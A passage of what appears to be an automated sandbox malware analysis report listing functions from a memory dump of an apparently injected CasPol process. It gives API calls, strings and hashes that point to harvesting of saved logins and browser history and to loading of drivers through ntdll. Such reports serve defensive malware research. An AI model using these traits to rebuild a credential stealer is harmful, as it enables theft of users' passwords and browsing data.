                                                                                                                                                                                  Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                  • API String ID: 3143752011-1996832678
                                                                                                                                                                                  • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                  • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                                                  Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,000000FF,00000000,00000104), ref: 00413559
                                                                                                                                                                                  • GetProcAddress.KERNEL32(NtLoadDriver,?,000000FF,00000000,00000104), ref: 0041356B
                                                                                                                                                                                  • GetProcAddress.KERNEL32(NtUnloadDriver,?,000000FF,00000000,00000104), ref: 0041357D
                                                                                                                                                                                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject,?,000000FF,00000000,00000104), ref: 0041358F
                                                                                                                                                                                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject,?,000000FF,00000000,00000104), ref: 004135A1
                                                                                                                                                                                  • GetProcAddress.KERNEL32(NtQueryObject,?,000000FF,00000000,00000104), ref: 004135B3
                                                                                                                                                                                  • GetProcAddress.KERNEL32(NtSuspendProcess,?,000000FF,00000000,00000104), ref: 004135C5
                                                                                                                                                                                  • GetProcAddress.KERNEL32(NtResumeProcess,?,000000FF,00000000,00000104), ref: 004135D7
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                                  • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                  • API String ID: 667068680-2887671607
                                                                                                                                                                                  • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                  • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                                  Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                  • API String ID: 1607361635-601624466
                                                                                                                                                                                  • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                  • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                  • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                                                  Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                  • API String ID: 2000436516-3842416460
                                                                                                                                                                                  • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                  • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                  • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                  Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                                    • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                    • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                    • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                  • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                  • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                  • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                  • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                  • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                  • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                  • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                  • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                  • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1043902810-0
                                                                                                                                                                                  • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                  • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                                  • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                  • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                                  Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                  • free.MSVCRT ref: 0040E49A
                                                                                                                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                  • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                  • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                  • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                                                                  • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E407
                                                                                                                                                                                  • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E422
                                                                                                                                                                                  • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E43D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                                  • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                  • API String ID: 3849927982-2252543386
                                                                                                                                                                                  • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                                                                  • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                                  • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                                                                  • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                                                  Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                  • API String ID: 2899246560-1542517562
                                                                                                                                                                                  • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                  • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                                  • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                  • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                                  Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                  • memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                  • memcmp.MSVCRT ref: 0040933B
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                  • memcmp.MSVCRT ref: 00409411
                                                                                                                                                                                  • memcmp.MSVCRT ref: 00409429
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                                  • memcmp.MSVCRT ref: 004094AC
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3715365532-3916222277
                                                                                                                                                                                  • Opcode ID: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                                                                                                                                                  • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                  • Opcode Fuzzy Hash: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                                                                                                                                                  • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                                                  Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                  • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                    • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                    • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                    • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                                  • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                                                                                                  • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                  • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                  • API String ID: 3330709923-517860148
                                                                                                                                                                                  • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                  • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                                                  Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                    • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?), ref: 0040CC98
                                                                                                                                                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                  • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                  • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                  • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                  • memset.MSVCRT ref: 004081E4
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                    • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                    • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                    • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                    • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                    • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                    • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                  • String ID: logins$null
                                                                                                                                                                                  • API String ID: 2148543256-2163367763
                                                                                                                                                                                  • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                  • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                                                  Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                  • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                  • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                  • memset.MSVCRT ref: 00408606
                                                                                                                                                                                  • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                                                                  • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                  • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004087A6
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                  • String ID: ---
                                                                                                                                                                                  • API String ID: 3437578500-2854292027
                                                                                                                                                                                  • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                                                  • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                                                  • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                                                  Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                  • memset.MSVCRT ref: 00410892
                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                  • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                  • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                  • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
